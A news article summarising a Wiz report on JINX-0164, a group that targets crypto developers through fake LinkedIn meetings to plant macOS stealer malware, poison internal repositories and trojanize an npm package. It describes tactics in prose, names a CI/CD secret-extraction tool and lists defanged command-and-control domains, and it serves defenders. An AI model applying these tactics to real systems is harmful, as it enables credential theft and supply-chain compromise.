JINX-0164 hits crypto developers with fake LinkedIn meeting malware

A group of hackers, tracked as JINX-0164, has been reaching out to crypto developers on LinkedIn — because of course it's LinkedIn — and luring them to fake meetings that drop custom macOS malware. The stealer grabs login credentials and hijacks the pipelines developers use to build and deploy software. Cloud security firm Wiz published its findings on May 27, 2026.

Wiz's incident response team tied the group to attacks going back to at least mid-2025. The pattern: a polished-looking LinkedIn profile, a suggested business call, and a link to a fake site dressed up as Microsoft Teams or a similar conferencing tool. Click the "meeting URL" and AUDIOFIX quietly begins installing. The macOS malware runs on both Intel and Apple Silicon Macs and is delivered via a script hosted on a fake Apple page. It persists across reboots, masquerades as a system audio component, and talks to its operators over HTTPS.

Once installed, it pulls saved passwords from the macOS Keychain, browser credentials, SSH keys, cloud access tokens for AWS, GCP, and Azure, and crypto wallet data. Wiz also found the attackers phishing for passwords directly and tucking them into encoded files. Source: WIZ.

What makes JINX-0164 different from your garden-variety infostealer is the focus on internal code repos and dev infrastructure. In a case study from early 2026, Wiz showed how the attackers used stolen GitHub tokens to pull secrets from CI/CD pipelines with an open-source tool called nord-stream. They then slipped AUDIOFIX into internal repos, impersonating real developers by forging Git commit metadata, and either pushed malicious code to main branches or hijacked existing ones. Other developers who pulled and built from the poisoned repos got infected automatically. The org's own dev workflow, in a tidy irony, became the distribution mechanism.

GitHub's Vigilant Mode — which flags commits lacking verified GPG signatures — caught the impersonation in at least one instance.

The group also pulled off a confirmed supply chain attack on a public npm package. On April 7, 2026, JINX-0164 trojanized version 4.9.1 of @velora-dex/sdk, slipping in a base64-encoded command that fetched and executed a remote script deploying MINIRAT, a lightweight Go-based backdoor built for persistence and remote command execution.

AUDIOFIX and MINIRAT share command-and-control domains including datahub[.]ink, cloud-sync[.]online, and byte-io[.]us. The attackers route their activity through Mullvad VPN, Astrill VPN, and ExpressVPN to obscure their real location. Wiz spotted tactical similarities with North Korean clusters UNC1069 and Sapphire Sleet, but no direct infrastructure overlap. JINX-0164 is being labeled a distinct, financially motivated threat actor.

In May, attackers compromised 170+ npm and PyPI packages, including the official Mistral AI Python library. That campaign exposed GitHub tokens and cloud credentials belonging to crypto and AI developers. It was also the first documented case of malicious packages carrying valid SLSA Build Level 3 provenance attestations — essentially breaking the cryptographic trust model meant to verify build integrity.

Targeting crypto and AI developers tends to pay, in both cash and code. Crypto labs and companies should tighten their security posture and audit CI/CD pipelines for unauthorized access or suspicious activity. Rogue GitHub actions, commits with unverified signatures, and odd VPN connections are all red flags. Any developer who joined a meeting sent via LinkedIn should probably run a scan.